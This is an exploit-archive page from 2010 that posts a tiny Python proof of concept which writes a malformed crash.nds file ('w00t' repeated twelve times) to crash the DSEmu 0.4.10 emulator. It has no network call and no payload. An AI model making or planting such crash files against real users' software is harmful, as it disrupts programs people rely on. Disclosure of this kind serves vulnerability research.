Home / os / win7

DSEmu 0.4.10 (.nds) Local Crash Exploit

Posted on 03 April 2010

======================================= DSEmu 0.4.10 (.nds) Local Crash Exploit ======================================= #!/usr/bin/env python #DSEmu 0.4.10 (.nds) local crash #Author: l3D #Sites: http://xraysecurity.blogspot.com, http://nullbyte.org.il #IRC: irc://irc.nix.co.il #Email: pupipup33@gmail.com blah=open('crash.nds', 'w') blah.write('w00t'*12) blah.close() # Inj3ct0r.com [2010-04-03]

 

TOP